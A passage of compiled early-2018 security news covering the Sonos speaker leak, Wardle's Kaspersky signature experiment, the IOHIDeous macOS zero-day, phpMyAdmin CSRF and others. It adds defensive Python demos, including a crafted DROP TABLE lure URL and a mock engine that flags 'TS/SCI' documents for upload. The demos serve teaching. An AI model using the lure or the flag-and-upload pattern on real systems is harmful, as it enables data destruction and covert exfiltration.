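    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    verdicts = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        # Decide on content, not on the declared type or extension.
        if data.startswith(SEVENZIP_MAGIC):
            verdicts.append((name, "quarantine",
                             "7z archive: members not inspected here, detonate in sandbox"))
        elif data.startswith(ZIP_MAGIC):
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                scripts = [m for m in archive.namelist() if _ext(m) in SCRIPT_EXTS]
            if scripts:
                verdicts.append((name, "block", "script inside archive: " + ", ".join(scripts)))
            else:
                verdicts.append((name, "allow", "archive without script members"))
        elif _ext(name) in SCRIPT_EXTS:
            verdicts.append((name, "block", "bare script attachment"))
        else:
            verdicts.append((name, "allow", "not a script or archive"))
    return verdicts


if __name__ == "__main__":
    for verdict in triage(build_sample_mail()):
        print(verdict)
```

On the constructed message the zip is blocked because of its `.js` member, the 7z is quarantined, and the PDF passes. Checking magic bytes first matters because a renamed `.7z` or a zip declared as `application/octet-stream` would otherwise slip past an extension-only rule.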


Internet-connected Sonos Speakers Leak User Information
3.1.2018 securityweek Vulnerability
A vulnerability found in Internet-connected Sonos Play:1 speakers can be abused to access information on users, Trend Micro has discovered.

By exploiting the issue, an attacker could learn a user’s musical preferences, get hold of their email address, and could even learn where the user lives and whether they are at home. Additionally, an attacker could play a recorded message on the device and trick the target into downloading malware.

While analyzing the device, Trend Micro’s researchers found that it had only three ports open, that the Sonos applications on it pointed to a specific website, and that most communication took place over TCP port 1400.

Under the /status URI path, the device serves a set of subpages through a simple web interface with no authentication, exposing information about the tracks being played and the music libraries the device knows about.

The same interface revealed personal information such as the email addresses associated with audio streaming services, and exposed various debug functions, including “the ability to traceroute, ping, and even make an mDNS announcement via a simple website,” the researchers say. The status page reveals other information as well.

“Let’s say an attacker knows the target uses a Sonos device. The attacker can then take the information collected here to tailor better attacks against the target. This could include mobile devices, printers, and even types of computers on the networks,” Trend Micro notes in a technical analysis (PDF).

The security researchers also described a series of plausible attack scenarios that could be used not only against home users, but also to target enterprise networks.

By learning the user’s musical preferences, an attacker could craft phishing emails and deliver them to the target. In a workplace environment, such an attack could be used to discover other IoT devices connected to the same network and find vulnerabilities on them to further compromise the network.

Using a website that combines multiple sources of Wi-Fi geolocation, an attacker could also find where the user lives (the researchers located the device from the wireless access points (WAPs) it tried to reach during installation) and tell whether they are at home by monitoring when the speaker is activated and deactivated.

“This hybrid attack involving cyber and physical elements presents new dangers that home and enterprise users should be aware of. Devices leaking presence data not only make users easier to predict — they can also put the user at physical risk,” the researchers say.

Leveraging information discovered on the aforementioned status page, including model numbers and serial numbers, an attacker could disrupt the device and even play a crafted status message containing misleading information.

The attacker could also send tailored emails to the user (to the addresses tied to accounts on music streaming applications) and trick them into downloading malware masquerading as a software update. Using other discoverable information on the target, the attacker could add personalized information to the message to make it even more convincing.

With the help of the Shodan search service, the researchers found roughly 5,000 Sonos devices exposed to the Internet. The manufacturer was informed of the findings and has already released an update to address the discovered bugs, but some of the issues continue to affect users, Trend Micro says.

“The problem of unsecured internet-connected devices is not limited to home users but also extends to workplace environments when seemingly safe IoT devices are introduced into the company network, as was shown in the attack scenarios. Whether these devices are installed to improve productivity or are simply brought to work by employees, the risk of having an exposed and unsecured device should not be taken lightly,” Trend Micro concludes.


Former NSA hacker reversed Kaspersky Lab antivirus to compose signatures capable of detecting classified documents
2.1.2018 securityaffairs BigBrothers

A former NSA hacker has demonstrated how to subvert the Kaspersky Lab antivirus and turn it into a powerful search tool for classified documents.
The Kaspersky case demonstrated that security software can be turned into a powerful spy tool by intelligence agencies.

Patrick Wardle, chief research officer at Digita Security and former NSA hacker, demonstrated it by subverting the Kaspersky Lab antivirus and turning it into a powerful search tool for classified documents.

“In the battle against malicious code, antivirus products are a staple,” Patrick Wardle told the New York Times. “Ironically, though, these products share many characteristics with the advanced cyberespionage collection implants they seek to detect.”

“I wanted to know if this was a feasible attack mechanism,” Mr. Wardle added. “I didn’t want to get into the complex accusations. But from a technical point of view, if an antivirus maker wanted to, was coerced to, or was hacked or somehow subverted, could it create a signature to flag classified documents?”

In December, US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.

According to a draft of a top-secret report leaked by Edward J. Snowden, the NSA has been targeting antivirus software (e.g. Check Point and Avast) since at least 2008 to collect sensitive information stored on target machines.

Mr. Wardle reverse-engineered Kaspersky Lab’s antivirus software to explore whether it could be abused for intelligence purposes. His goal was to compose a signature able to detect classified documents.

Mr. Wardle found the code incredibly complex, but, as with any antivirus software, Kaspersky’s malware signatures are easily updated. That update mechanism could be used to push a signature that automatically scans a victim’s machine for classified documents and flags them.

“Modern anti-virus products are incredibly complex pieces of software and Kaspersky is likely one of the most complex. Thus, merely gaining a reasonable understanding of its signatures and scanning logic is a challenging task.” wrote Wardle.

“Though the installer ships with built-in signatures, as is the case with any anti-virus program, Kaspersky’s anti-virus engine regularly checks for, and automatically installs any new signatures,” Wardle continued. “When new signatures are available, they are downloaded by the kav daemon from Kaspersky’s update servers.”

Wardle found that antivirus scanning could thus be repurposed for cyberespionage.

The expert pointed out that officials routinely mark top secret documents with “TS/SCI” (“Top Secret/Sensitive Compartmented Information”), so he added a rule to Kaspersky’s antivirus program to flag any document containing the “TS/SCI” marker.

To test the new rule, the researcher edited a document on his computer containing text from the Winnie the Pooh children’s book series and added the “TS/SCI” marker.


As soon as the Winnie the Pooh document was saved to his machine, the Kaspersky’s antivirus software flagged and quarantined the document.

The next phase of Wardle’s test looked at how flagged documents are handled; it is normal for antivirus software to send flagged files back to the vendor for further analysis.

Kaspersky Lab disputed Wardle’s conclusion, arguing that the company cannot deliver a specific signature or update to a single user in a stealthy way.

“It is impossible for Kaspersky Lab to deliver a specific signature or update to only one user in a secret, targeted way because all signatures are always openly available to all our users; and updates are digitally signed, further making it impossible to fake an update,” Kaspersky said in a statement.

Still, Wardle’s research shows that if a vendor’s platform is compromised, or the vendor is coerced, the antivirus can be used as a search tool.

“However, a malicious or willing insider within any anti-virus company, who could tactically deploy such a signature, would likely remain undetected. And of course, in a hypothetical scenario; any anti-virus company that is coerced to, or is willing to work with a larger entity (such as a government) would equally be able to stealthily leverage their product to detect and exfiltrate any files of interest.” concluded the expert.
“Sometimes the line between what is good and evil, comes down to a single signature… “
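Wardle's point is that the scanning engine has no notion of the difference between a malware string and a classification marking. The following is an added example, not Kaspersky code or the rule Wardle actually wrote: since real signature formats are proprietary, it uses a constructed rule shape (name, byte patterns, action) and a constructed set of files, and shows that a conventional dropper rule and a rule keyed on the “TS/SCI” marking go through the same match, quarantine and “upload sample for analysis” path, which is where detection becomes exfiltration. The rule names, patterns and file contents are made up.

```python
"""A signature engine does not know "malware" from "classified": worked example.

Added example, not Kaspersky code or the rule Wardle wrote; signature formats
are proprietary, so the rules below are a constructed stand-in with the same
shape (name, byte patterns, action). It scans a constructed set of files with
one ordinary malware-style rule and one rule keyed on the TS/SCI marking, and
shows that the engine treats both hits identically, including the "upload
for analysis" step that turns a detection into exfiltration.
"""
import hashlib
import re

RULES = [
    # Conventional rule: a byte string found in a (constructed) dropper family.
    {"name": "Trojan.Constructed.Dropper",
     "patterns": [rb"DROPPER_STAGE2_v\d+", rb"\x4d\x5a.{0,64}stage2\.dll"],
     "action": "quarantine"},
    # The Wardle-style rule: classification markings instead of malware strings.
    {"name": "Doc.Marking.TSSCI",
     "patterns": [rb"\bTS/SCI\b", rb"TOP SECRET//SI"],
     "action": "quarantine+upload"},
]

# Constructed file set: a benign note, the Winnie-the-Pooh test document with
# a marking pasted in, and a binary carrying the dropper string.
SAMPLE_FILES = {
    "notes.txt": b"grocery list: honey, more honey",
    "pooh.txt": b"TS/SCI\nChristopher Robin came down from the Forest "
                b"to the bridge, feeling all sunny and careless.",
    "dropper.bin": b"\x4d\x5a\x90\x00" + b"\x00" * 20 + b"DROPPER_STAGE2_v3 stage2.dll",
}


def scan(files, rules=RULES):
    """Apply every rule to every file; return (path, rule, action, sha256) hits."""
    hits = []
    for path, data in files.items():
        for rule in rules:
            if any(re.search(p, data, re.DOTALL) for p in rule["patterns"]):
                hits.append((path, rule["name"], rule["action"],
                             hashlib.sha256(data).hexdigest()))
    return hits


def build_upload(files, hits):
    """What an engine configured to "send suspicious samples to the vendor" ships.

    For a malware hit that is a sample for analysis; for a marking hit it is the
    document itself. Same code path, same packet.
    """
    return [{"path": path, "rule": rule, "sha256": digest, "content": files[path]}
            for path, rule, action, digest in hits if "upload" in action]


if __name__ == "__main__":
    found = scan(SAMPLE_FILES)
    for hit in found:
        print(hit[:3])
    print("would upload:", [u["path"] for u in build_upload(SAMPLE_FILES, found)])
```

The engine quarantines both `pooh.txt` and `dropper.bin`; only the marking rule is configured to upload, so the Pooh document is what leaves the machine. Nothing in the scanner distinguishes the two rules, which is why Kaspersky's rebuttal rests on the distribution channel (signed, globally visible updates) rather than on the engine.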


Iran ‘s Government is reportedly blocking the Internet to calm down protests
2.1.2018 securityaffairs BigBrothers

The Iranian Government is trying to isolate the protests by blocking Internet access on mobile networks; authorities are blocking Instagram and messaging services such as Telegram.
At least 12 people have died in the biggest challenge to the Tehran regime since the mass demonstrations of 2009. Iranian President Hassan Rouhani has tried to downplay the situation as violent protests mount across the country.

The Government is also trying to isolate the protests by cutting Internet access on mobile networks; multiple reports confirm that authorities have been blocking social media services such as Instagram and messaging services such as Telegram since December 30.

“It’s a busy weekend for oppressive governments trying to suppress digital communication. Iran has blocked mobile access to at least Telegram and Instagram as it tries to thwart protests that started over economic concerns (particularly inflation), but have extended into broader resistance to the government and clerical rule.” reported the website engadget.com.

“Officials claim the censorship is meant to “maintain peace,” but the argument doesn’t hold water. Telegram founder Pavel Durov noted that his company refused to shut down “peacefully protesting channels,” and Instagram is primarily being used to document protests — Iran clearly doesn’t want to reveal the extent of the demonstrations.”


Pavel Durov (@durov), Dec 31, 2017: “Iranian authorities are blocking access to Telegram for the majority of Iranians after our public refusal to shut down https://t.me/sedaiemardom and other peacefully protesting channels.”
The Government fears that technology could amplify the protests, as happened during the Arab Spring.

“The authorities appeared to respond by cutting internet access to mobile phones, with the main networks interrupted at least in Tehran shortly before midnight” AFP reporters said.

“Several Iranian news agencies warned Telegram, the most popular social media service in the country, might soon be shut down after communications minister Mohammad-Javad Azari Jahromi accused one popular channel, Amadnews, of encouraging an “armed uprising”.”

Kavé Salamatian (@kavesalamatian), Jan 1, 2018: “@bgpmon @InternetIntel Changes in Iran BGP connectivity happening right now. Seems that the full internet is getting disconnected”

@InternetIntel, Jan 1, 2018: “Large routing outage in Iran about 2hrs ago. pic.twitter.com/382BYEIscF”

Iran Freedom (@4FreedominIran), Jan 1, 2018: “#Sanandaj, January 1 - Large crowd took to streets confronting oppressive security forces. Some were arrested. (via #MEK activists in #Iran) #FreeIran #Iranprotests #IranProtests #Iran #RegimeChange”
“How nervous the government is about losing control over the population is proportional to various control tactics they implement over the Internet,” Mahsa Alimardani, who researches internet freedoms in Iran for Article 19, told Motherboard. “In the past few hours there are also some reports of home connections (up until today mostly left undisturbed) also facing some blocks to accessing foreign web content.”

At the time of writing, the real effect on the population’s Internet access is not clear; Tor metrics, however, show an increase in the number of users connecting directly to the Tor network from Iran.

During Iran’s elections in 2017, Rouhani promised to cut down on censorship, but evidently that was only political propaganda.


Force 47 – The Vietnamese brigade tasked with fighting “wrongful views” spreading online
2.1.2018 securityaffairs APT

Force 47 is a brigade of 10,000 cyber warriors tasked with fighting online dissent in Vietnam, a new threat to freedom of speech in the country.
Like many other governments, Vietnam is deploying a cyber army, in this case 10,000 personnel, to fight online dissent.

The news was revealed by a top Vietnamese general last week, who said the brigade, dubbed ‘Force 47’, has been tasked with fighting “wrongful views” spreading online.

More than half of the country’s roughly 93 million people have access to the Internet.

According to web watchdog Freedom House, the Internet in Vietnam is “not free”; the organization ranks the country second only to China in Asia.

Human Rights Watch deputy Asia director Phil Robertson believes that the brigade Force 47 is a “shocking new dimension to Vietnam’s crackdown on dissent”.

“This is just the latest plank in a campaign to curb internet freedoms at all costs,” Shawn Crispin, Committee to Protect Journalists’ Southeast Asia representative, told AFP Friday.

“While they can’t unplug Facebook, Instagram and the likes outright, they can apply more and more pressure on those platforms and it looks like these cyber troops are their latest attempt to do that.”

Activist Nguyen Chi Tuyen (aka Anh Chi) said the new brigade marks a significant escalation of online repression.

“The main purpose for Force 47 is to try and control news and public opinion on the internet… they want to protect the party, not protect the country,” explained Tuyen.

The Vietnamese Government already applies strict online monitoring, and it continues to ask tech giants such as Facebook and YouTube to remove “toxic content” from their platforms.

The Vietnamese Government believes that hostile groups and foreign governments could use social media and the Internet to destabilize the country and threaten the “prestige of the party’s leaders and the state”.

According to Amnesty International, many dissidents have already been identified and arrested in the country, at least 15 people in the past year.

Madeline Earp, a senior research analyst with Freedom House, explained that Force 47 is likely to include commentators tasked with spreading pro-government content online and countering critics.

“Vietnam very much follows China’s example when suppressing internet freedom, particularly when it comes to blocking websites and arresting dissidents,” she told AFP.

Vietnam has built up considerable cyber capabilities over the years; according to incident response firm Volexity, the Vietnamese APT32 group is today one of the most advanced APTs in the threat landscape.


Expert publicly disclosed a macOS zero-day that allows local privilege escalation
2.1.2018 securityaffairs Apple

A security researcher has publicly disclosed the details of a macOS zero-day flaw that can be exploited to take complete control of a system.
A security researcher who goes by the Twitter handle Siguza (@s1guza) has publicly disclosed the details of a macOS zero-day vulnerability that can be exploited to take complete control of a system. The expert speculates that the flaw has been around since at least 2002.

Siguza (@s1guza), Dec 31, 2017: “Fuck it, dropping a macOS 0day. Happy New Year, everyone. https://siguza.github.io/IOHIDeous/”
The flaw is a local privilege escalation (LPE) vulnerability that affects IOHIDFamily, a kernel extension designed for human interface devices (HID) (e.g. the touchscreen, buttons, accelerometer, etc.).

The flaw affects all versions of macOS and yields an arbitrary read/write primitive in the kernel.

An attacker who has access to a system can trigger the zero-day flaw to execute arbitrary code and gain root permissions.

The expert was looking through the IOHIDFamily source for iOS kernel vulnerabilities when he discovered that the IOHIDSystem component exists only on macOS.

“I was originally looking through its source in the hope of finding a low-hanging fruit that would let me compromise an iOS kernel, but what I didn’t know it then is that some parts of IOHIDFamily exist only on macOS – specifically IOHIDSystem, which contains the vulnerability discussed herein.” Siguza wrote in the technical analysis published on GitHub.

The expert published PoC code, dubbed IOHIDeous, that works on Sierra and High Sierra (up to 10.13.1, see README) and is able to disable both System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI).

“Targets Sierra and High Sierra (up to 10.13.1, see README), achieves full kernel r/w and disables SIP to prove that the vulnerability can be exploited by any unprivileged user on all recent versions of macOS.” continues the expert.

The exploit runs as fast as possible so that it needs no user interaction; on shutdown, for example, “we’d be able to slip in between the user getting logged out and the kernel killing us.”


The PoC published by Siguza does not appear to work on macOS High Sierra 10.13.2, released on December 6, but the expert believes this version is still vulnerable.

“The prefetch timing attack I’m using for hid for some reason doesn’t work on High Sierra 10.13.2 anymore, and I don’t feel like investigating that.” said Siguza.

“Maybe patched, maybe just the consequence of a random change, I neither know nor care. The vuln is still there and my code does both info leak and kernel r/w, just not in the same binary – reason is explained in the write-up. If you want that feature, consider it an exercise for the reader.”

Siguza publicly disclosed this macOS zero-day because it is exploitable only by a local attacker and because Apple’s bug bounty program does not cover macOS.

Security Around The World (@security_china), Jan 1, 2018, replying to @s1guza: “Can I ask, why not sell it? I'm sure some government or blackhat would have paid a lot for it? Or are you just the type of person who can't be reasoned with, who doesn't care for money and just want to watch the world burn?”

Siguza (@s1guza), Jan 1, 2018: “My primary goal was to get the write-up out for people to read. I wouldn't sell to blackhats because I don't wanna help their cause. I would've submitted to Apple if their bug bounty included macOS, or if the vuln was remotely exploitable.”


CSRF Vulnerability in phpMyAdmin allows attackers to perform DROP TABLE with a single click!
2.1.2018 securityaffairs Vulnerability

The development team of phpMyAdmin has fixed a CSRF vulnerability that could be exploited by attackers to perform harmful database operations such as dropping tables.
Researcher Ashutosh Barot discovered a critical CSRF vulnerability in phpMyAdmin that could be exploited to perform malicious operations such as dropping tables and deleting records.

phpMyAdmin developers released the version 4.7.7 that addresses the CSRF vulnerability found by Barot.

“By deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables etc.” reads the security advisory published by phpMyAdmin developers.

An attacker could trick a database admin into performing database operations like DROP TABLE using CSRF with devastating consequences.

“In this case, a CSRF vulnerability allows an attacker to send a crafted URL to the victim and if she (authenticated user) clicks it, the victim may perform a DROP TABLE query on her database. phpMyAdmin team considers this issue as critical vulnerability.” reads the analysis published by Ashutosh Barot.

This means that an attacker can create a crafted URL and trick the victims having an active session into performing dangerous operations without their knowledge.

The expert found that phpMyAdmin uses GET requests for database operations such as DROP TABLE table_name, which means an attacker can trick a database admin into clicking a link and performing a database query of the attacker’s choice.


Ashutosh Barot also found that the URLs used to perform database operations are saved in the browser history, where anyone with access to them can learn information about the database.

“Any query you execute by clicking insert, DROP, etc., button as shown in above image. The URL will contain database name and table name as GET request was used to perform DB Operations. URLs are stored at various places such as browser history, SIEM logs, Firewall Logs, ISP Logs, etc. This URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!)” continues the analysis.

The expert pointed out that the CSRF attack worked even when the user was authenticated only in cPanel and phpMyAdmin had been closed after use.

The vulnerability is rated Medium severity because its exploitation requires user interaction.

Barot also published a video PoC.

All versions prior to 4.7.7 are affected by the vulnerability; users must update their installations or apply the following patches:

The following commit was made on the 4.7 branch to fix this issue: edd929216ade9f7c150a262ba3db44db0fed0e1b

The following commit was made on the 4.8 branch to fix this issue: 72f109a99c82b14c07dcb19946ba9b76efc32a1b
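Both phpMyAdmin articles above describe the same two ingredients: a state-changing operation reachable by GET, and authentication carried only by the session cookie, which the browser attaches to any request a third-party page triggers. The following is an added example that is not phpMyAdmin's code or Barot's PoC: a minimal request model stands in for the web application, the host name and the `sql.php` URL shape are made up, and the dropped table is a dict mutation. It replays the forged request an `<img>` tag or crafted link produces against the vulnerable handler and against a hardened one that accepts the operation only over POST with a per-session token compared in constant time.

```python
"""GET-driven database operation with cookie-only auth beside a CSRF-proof one.

Added example, not phpMyAdmin's code or Barot's PoC: a minimal request model
stands in for the web app, the host name and the sql.php URL shape are made
up, and the "drop table" is a dict mutation. It shows why a crafted link or
<img> tag was enough (the browser attaches the session cookie to the forged
GET), and the two changes that close the hole: state changes only on POST,
and a per-session token compared in constant time.
"""
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit


class Request:
    """Just the fields a handler looks at: method, query string, cookies, form body."""

    def __init__(self, method, url, cookies=None, form=None):
        self.method = method
        parts = urlsplit(url)
        self.query = {k: v[0] for k, v in parse_qs(parts.query).items()}
        self.cookies = cookies or {}
        self.form = form or {}


def make_state():
    """Fresh app state: one logged-in admin session and one small database."""
    return {"sessions": {"sid-admin": {"csrf": secrets.token_hex(16)}},
            "tables": {"shop": {"orders", "customers"}}}


def vulnerable_drop_table(state, req):
    """Pre-4.7.7 shape: the operation runs on GET, gated only by the cookie."""
    if req.cookies.get("sid") not in state["sessions"]:
        return 401
    state["tables"][req.query["db"]].discard(req.query["table"])
    return 200


def hardened_drop_table(state, req):
    """POST only, and the body must carry the token bound to this session."""
    session = state["sessions"].get(req.cookies.get("sid"))
    if session is None:
        return 401
    if req.method != "POST":
        return 405  # a link, <img>, or redirect can only produce a GET
    token = req.form.get("token", "")
    if not hmac.compare_digest(token, session["csrf"]):
        return 403  # a cross-site page cannot read the token to include it
    state["tables"][req.form["db"]].discard(req.form["table"])
    return 200


def forged_get(url, victim_cookies):
    """What the victim's browser emits for <img src="url">: GET plus its cookies."""
    return Request("GET", url, cookies=victim_cookies)


def run_scenarios():
    """Replay the attack and the legitimate request against both handlers."""
    victim = {"sid": "sid-admin"}
    lure = ("https://dbadmin.example.invalid/sql.php"
            "?db=shop&table=orders&sql_query=DROP+TABLE+orders")
    results = {}

    state = make_state()
    results["vulnerable_get"] = (vulnerable_drop_table(state, forged_get(lure, victim)),
                                 sorted(state["tables"]["shop"]))

    state = make_state()
    results["hardened_get"] = (hardened_drop_table(state, forged_get(lure, victim)),
                               sorted(state["tables"]["shop"]))

    state = make_state()
    no_token = Request("POST", lure, cookies=victim, form={"db": "shop", "table": "orders"})
    results["hardened_post_no_token"] = (hardened_drop_table(state, no_token),
                                         sorted(state["tables"]["shop"]))

    state = make_state()
    legit = Request("POST", "https://dbadmin.example.invalid/sql.php", cookies=victim,
                    form={"db": "shop", "table": "orders",
                          "token": state["sessions"]["sid-admin"]["csrf"]})
    results["hardened_post_with_token"] = (hardened_drop_table(state, legit),
                                           sorted(state["tables"]["shop"]))
    return results


if __name__ == "__main__":
    for name, outcome in run_scenarios().items():
        print(f"{name:26s} -> status {outcome[0]}, tables left: {outcome[1]}")
```

The forged GET drops `orders` on the vulnerable handler and is refused with 405 on the hardened one; a cross-site POST without the token gets 403, and only the admin's own form, which can read the token from the page, succeeds. Moving the operation to POST also addresses Barot's second point: the database and table names no longer appear in the URL, so they stop showing up in browser history and proxy or firewall logs.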


Unpatched macOS Flaw Allows Code Execution, Root Access
2.1.2017 securityweek Apple
A researcher who specializes in hacking Apple’s iOS operating system has made public the details of an unpatched vulnerability in macOS that can be exploited to take complete control of a system.

The details of the exploit and proof-of-concept (PoC) code were made public on the first day of 2018 – or the last day of 2017, depending on where you are located in the world – by a researcher who uses the online moniker Siguza (s1guza). An attacker who has access to a system can leverage the vulnerability, which the expert has described as a “zero day,” to execute arbitrary code and obtain root permissions.

This local privilege escalation (LPE) vulnerability affects IOHIDFamily, a kernel extension designed for human interface devices (HID), such as a touchscreen or buttons. While trying to discover flaws that would let him hack the iOS kernel, Siguza noticed that some components of this extension, specifically IOHIDSystem, exist only on macOS, which led him to identify a potentially serious security hole.

The bugs he discovered affect all versions of macOS and they can lead to an arbitrary read/write vulnerability in the kernel. The exploit created by the hacker also disables the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security features.

However, the expert pointed out that his exploit, dubbed IOHIDeous, is not stealthy as it needs to force a logout of the logged-in user. On the other hand, an attacker could design an exploit that is triggered when the targeted device is manually shut down or rebooted.

Some of the PoC code made available by Siguza only works on macOS High Sierra 10.13.1 and earlier, but the researcher believes the exploit can be tweaked to work on the latest version as well, namely 10.13.2, which Apple released on December 6.

The expert believes the vulnerability has been around since at least 2002, but some clues suggest it could actually be a decade older than that. “One tiny, ugly bug. Fifteen years. Full system compromise,” Siguza said.

The researcher said he would have reported his findings to Apple instead of disclosing them to the public if the flaw had been remotely exploitable or if the tech giant’s bug bounty program covered macOS.

SecurityWeek has reached out to Apple for comment and will update this article if the company responds.

Some may argue that making the exploit public puts macOS users at risk of attacks, but Siguza believes that is not the case.



Critical Vulnerability Patched in phpMyAdmin
2.1.2017 securityweek
Vulnerability
An update released just before the holidays by the developers of phpMyAdmin patches a serious vulnerability that can be exploited to perform harmful database operations by getting targeted administrators to click on specially crafted links.

phpMyAdmin is a free and open source tool designed for managing MySQL databases over the Internet. With more than 200,000 downloads every month, phpMyAdmin is one of the top MySQL database administration tools.

India-based researcher Ashutosh Barot discovered that phpMyAdmin is affected by a cross-site request forgery (CSRF) flaw that can be exploited by an attacker to drop tables, delete records, and perform other database operations.

For the attack to work, an authenticated admin needs to click on a specially crafted URL. However, Barot noted that the attack works as long as the user is logged in to the cPanel web hosting administration interface, even if phpMyAdmin has been closed after use.

These types of attacks are possible due to the fact that vulnerable versions of phpMyAdmin use GET requests for database operations, but fail to provide CSRF protection.

The researcher also discovered that the URLs associated with database operations performed via phpMyAdmin are stored in the web browser history, which can pose security risks.

“The URL will contain database name and table name as a GET request was used to perform DB operations,” Barot said in a blog post published on Friday. “URLs are stored at various places such as browser history, SIEM logs, firewall logs, ISP logs, etc. This URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!). Wherever the URL is being saved, an adversary can gain some information about your database.”

phpMyAdmin developers fixed the CSRF vulnerability found by Barot with the release of version 4.7.7. All prior 4.7.x versions are impacted by the security hole, which phpMyAdmin has classified as “critical.” Users have been advised to update their installations or apply the available patch.
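As an added illustration of the two weaknesses described above (a state-changing operation driven by a GET request with no CSRF protection, and database/table names ending up in URLs and logs), the Python below is example code written for this page, not phpMyAdmin's own. It contrasts a vulnerable handler with a hardened one that accepts only POST requests carrying a per-session synchronizer token. The `Database` class, the request dictionaries and the helper names are constructed for the example.

```python
import hmac
import secrets


class Database:
    """Constructed in-memory stand-in for the MySQL database behind phpMyAdmin."""

    def __init__(self):
        self.tables = {"users": 3, "orders": 1}  # table name -> row count

    def drop_table(self, name):
        self.tables.pop(name, None)


def handle_vulnerable(db, request):
    """Vulnerable pattern: a destructive operation driven by GET parameters and
    nothing else. The browser attaches the admin's session cookie to any request,
    so a link or <img src=...> on an unrelated page is enough to trigger it."""
    if request["method"] == "GET" and request["params"].get("sql") == "drop":
        db.drop_table(request["params"]["table"])
        return 200
    return 400


class CsrfGuard:
    """Synchronizer-token pattern: one random token per login session, required
    on every state-changing request and compared in constant time."""

    def __init__(self):
        self._tokens = {}  # session id -> token

    def issue(self, session_id):
        token = secrets.token_hex(16)
        self._tokens[session_id] = token
        return token

    def check(self, session_id, presented):
        expected = self._tokens.get(session_id)
        if expected is None or presented is None:
            return False
        return hmac.compare_digest(expected, presented)


def handle_hardened(db, guard, request):
    """Hardened pattern: state changes only via POST, and only with a token that
    belongs to the requesting session. Database and table names travel in the
    POST body, so they no longer land in browser history or proxy/firewall logs."""
    if request["method"] != "POST":
        return 405
    form = request["form"]
    if not guard.check(request["session"], form.get("token")):
        return 403
    if form.get("sql") == "drop":
        db.drop_table(form["table"])
        return 200
    return 400


# Request shapes are constructed for this example; a real framework would
# build them from the HTTP request.
def forged_get(table):
    """What an attacker-controlled page can make the victim's browser send."""
    return {"method": "GET", "session": "admin-session", "params": {"sql": "drop", "table": table}}


def legit_post(session_id, token, table):
    """What the application's own form sends after the admin clicks 'Drop'."""
    return {"method": "POST", "session": session_id, "form": {"sql": "drop", "table": table, "token": token}}


def demo():
    """Return (status, 'users' table still present) for each scenario."""
    results = {}
    db = Database()
    results["vulnerable_forged_get"] = (handle_vulnerable(db, forged_get("users")), "users" in db.tables)

    db = Database()
    guard = CsrfGuard()
    token = guard.issue("admin-session")
    results["hardened_forged_get"] = (handle_hardened(db, guard, forged_get("users")), "users" in db.tables)
    results["hardened_post_no_token"] = (handle_hardened(db, guard, legit_post("admin-session", None, "users")), "users" in db.tables)
    results["hardened_post_wrong_session"] = (handle_hardened(db, guard, legit_post("other-session", token, "users")), "users" in db.tables)
    results["hardened_post_valid"] = (handle_hardened(db, guard, legit_post("admin-session", token, "users")), "users" in db.tables)
    return results


if __name__ == "__main__":
    for name, (status, present) in demo().items():
        print(f"{name:30} status={status} users-table-present={present}")
```

The token check uses `hmac.compare_digest` so that a forged request cannot learn the token byte by byte from timing differences, and the token is bound to the session so a token issued to one session is useless for another.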


Botnet's Huawei Router Exploit Code Now Public
2.1.2017 securityweek
Exploit
Exploit code used by the Satori botnet to compromise Huawei routers via a zero-day vulnerability became public last week, researchers have discovered.

The exploit has been used in attacks involving the Mirai variant Satori to target Huawei vulnerability CVE-2017-17215, which was unpatched at the time the first assaults started. The vulnerability was found in Huawei HG532 devices in November. Shortly after, Huawei published an advisory on how users can circumvent or prevent the exploit.

Discovered on Pastebin this Christmas, the code could fuel a spike in attempts to exploit the vulnerability. In fact, it has already been used by the destructive BrickerBot malware to target Internet of Things (IoT) devices, NewSky Security says.

In early December, the actor behind BrickerBot dumped some of the code online and announced plans to retire his project. The released code included some of the malware’s attack modules, including one that targeted said Huawei flaw, researchers have discovered.

“While analyzing this code, we also uncovered the usage of CVE-2017–17215, implying that this code has been in blackhats’ hands for a while,” NewSky reveals.

While analyzing the Satori and BrickerBot code, the security researchers noticed that the same attack vector (code injection) is present in both, which led to the conclusion that both malware developers “had copied the exploit source code from the same source.”

The security researchers also point out that the SOAP protocol (Simple Object Access Protocol) has been abused before in attacks involving IoT devices. Several Mirai variants observed last year were using two other SOAP bugs (CVE-2014-8361 and TR-64). One iteration was using them together, to increase the chances of a successful attack.

“IoT attacks are becoming modular day by day. When an IoT exploit becomes freely available, it hardly takes much time for threat actors to up their arsenal and implement the exploit as one of the attack vectors in their botnet code,” NewSky concludes.


Forever 21 confirms Payment Card Breach and provides further info on the incident
1.1.2018 securityaffairs Incident

FOREVER 21 confirmed the presence of a malware at some point of sale (POS) systems in stores across the US.
In November 2017, the US clothes retailer FOREVER 21 announced it had suffered a security breach; the company has now confirmed that hackers stole payment card data from its locations throughout the country for several months during 2017.

Although the investigation is still ongoing, FOREVER 21 confirmed the presence of malware on some point of sale (POS) systems in stores across the US; the malicious code was active at least between April 3, 2017, and November 18, 2017.

Payments made on the company website, forever21.com, were not affected by the incident.

The company explained that it has been using encryption technology since 2015 to protect its payment processes, but the investigation revealed that the encryption was switched off for some POS terminals at certain stores, a circumstance that allowed crooks to install the malware.

“The investigation determined that the encryption technology on some point-of-sale (POS) devices at some stores was not always on. The investigation also found signs of unauthorized network access and installation of malware on some POS devices designed to search for payment card data. The malware searched only for track data read from a payment card as it was being routed through the POS device. In most instances, the malware only found track data that did not have cardholder name – only card number, expiration date, and internal verification code – but occasionally the cardholder name was found.” reads the advisory published by the company.

“The investigation found that encryption was off and malware was installed on some devices in some U.S. stores at varying times during the period from April 3, 2017 to November 18, 2017. In some stores, this scenario occurred for only a few days or several weeks, and in some stores this scenario occurred for most or all of the timeframe.”

The company pointed out that not every POS terminal in affected stores was infected with the malware.

“Each Forever 21 store has multiple POS devices, and in most instances, only one or a few of the POS devices were involved. Additionally, Forever 21 stores have a device that keeps a log of completed payment card transaction authorizations,” the company said while explaining the incident.

